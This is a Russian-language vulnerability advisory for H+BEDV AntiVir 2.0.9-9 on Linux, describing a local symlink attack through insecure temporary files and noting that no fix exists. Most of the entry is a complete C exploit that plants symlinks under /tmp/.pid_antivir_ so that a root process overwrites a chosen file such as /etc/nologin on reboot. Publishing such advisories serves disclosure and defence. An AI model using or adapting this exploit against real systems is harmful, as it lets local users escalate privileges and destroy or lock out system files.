Дата публикации: | 16.01.2004 |
Всего просмотров: | 1129 |
Опасность: | Низкая |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Локальная |
Воздействие: | Повышение привилегий |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | H+BEDV AntiVir |
Уязвимые версии: AntiVir 2.0.9-9
Описание: Уязвимость обнаружена в AntiVir в Linux версии. Локальный пользователь может получить поднятые привилегии на целевой системе. Программа небезопасно создает временные файлы. В результате локальный пользователь может выполнить нападение символьных ссылок, чтобы перезаписать произвольные файлы на системе с поднятыми привилегиями. Пример/Эксплоит: example: ./antisys /etc/nologin (reboot) ls -l /etc/nologin rw------- root root /etc/nologin have phun! *******************************************************************/ #include <stdio.h> #include <unistd.h> #include <string.h> #define PATH "/tmp/.pid_antivir_" #define START 1000 #define END 2000 int main(int argc, char **argv) { int i; char buf[150]; printf("Antivir 2.0.9-9 exploit - written by l0om \n"); printf(" WWW.EXCLUDED.ORG\n\n") if(argc != 2) { printf("usage: %s <destination-file>\n",argv[0]); exit(0xff); } printf("### hit enter to create or overwrite file % s: ",argv[1]); fflush(stdout); read(1, buf, 1); fflush(stdin); printf("working\n\n"); for(i = START; i < END; i++) { snprintf(buf, sizeof(buf),"%s%d",PATH,i); if(symlink(argv[1], buf) == -1) { fprintf(stderr, "cannot creat symlink from %s to %s [Nr.%d]\n",buf,argv[1],i); fprintf(stderr, "skipping...\n"); } } printf("\ndone!\n"); printf("on the next reboot we hopefully create or overwrite %s\n",argv[1]); return(0x00); } URL производителя: http://www.hbedv.com/index.html Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | symlink vul for Antivir / Linux Version 2.0.9-9 (maybe lower) |